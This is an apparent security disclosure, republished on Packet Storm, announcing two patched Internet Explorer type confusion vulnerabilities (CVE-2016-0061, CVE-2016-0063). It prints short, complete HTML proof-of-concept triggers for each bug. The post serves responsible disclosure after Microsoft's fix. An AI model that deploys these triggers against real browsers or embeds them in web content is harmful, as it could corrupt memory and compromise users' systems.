Multiple type confusion vulnerabilities have been identified in Microsoft Internet Explorer.
c45987a41ea1716f25b8305b8106839624da2cc538ef5c79eff30b9c9599c037Hello everyone,
I've recently released examples on twitter of how to trigger two
security vulnerabilities in Microsoft Internet Explorer. These issue
were discovered last year and reported to Microsoft through ZDI.
Microsoft release security updates to address these issues last Tuesday.
======
CVE-2016-0061:
https://twitter.com/berendjanwever/status/697819335574843394
MSHTML Form element id type confusion CVE-2016-0061 ZDI-16-162 MS16-009
<meta http-equiv=X-UA-Compatible content=IE=7><form id="䅁䅁"><body onload=opener?opener["\u4141\u4141"]():open("?")>
======
CVE-2016-0063:
https://twitter.com/berendjanwever/status/697818121835581441
DOMImplementation method type confusion CVE-2016-0063 ZDI-16-166 MS16-009
<body onload=open("2.html")> (part 1/2)
<meta http-equiv=X-UA-Compatible content=IE=11><body onload=x=opener.DOMImplementation(0).prototype.isPrototypeOf;x()> (part 2/2)
======
Both were found through fuzzing inspired by Michal Zalewski's cross_fuzz
http://lcamtuf.blogspot.nl/2011/01/announcing-crossfuzz-potential-0-day-in.html
Cheers,
SkyLined
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed